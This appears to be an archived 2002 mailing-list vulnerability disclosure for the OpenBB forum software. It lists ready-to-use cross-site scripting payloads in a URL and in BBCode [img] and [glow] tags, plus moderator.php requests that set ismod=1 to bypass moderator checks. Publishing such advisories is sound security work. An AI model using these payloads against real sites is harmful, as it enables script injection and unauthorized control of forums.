('binary' encoding is not supported, stored as-is) Product : OpenBB http://www.prolixmedia.com Versions : 1.0.0 RC3 (and less ?) Problems : - XSS - Access to moderators' options Exploits : - /myhome.php?action=messages&box=<*form%20name=a><input% 20name=i%20value=XSS></*form><*script>alert (document.a.i.value)</*script> - [img]http://" onerror="[SCRIPT]"[/img] - [glow tcolor=')" onmouseover="[SCRIPT]" nothing="('hop, fcolor=red, size=100]HUHUHU[/glow] - moderator.php?action=lock&TID=FORUMID&ismod=1 moderator.php?action=lock&TID=FORUMID&ismod=1&status=1 - etc ... More details in french : http://www.ifrance.com/kitetoua/tuto/OpenBB.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F% 2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FOpenBB.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=% 2Flanguage_tools frog-m@n
This archive was generated by hypermail 2b30 : Thu May 23 2002 - 21:33:47 PDT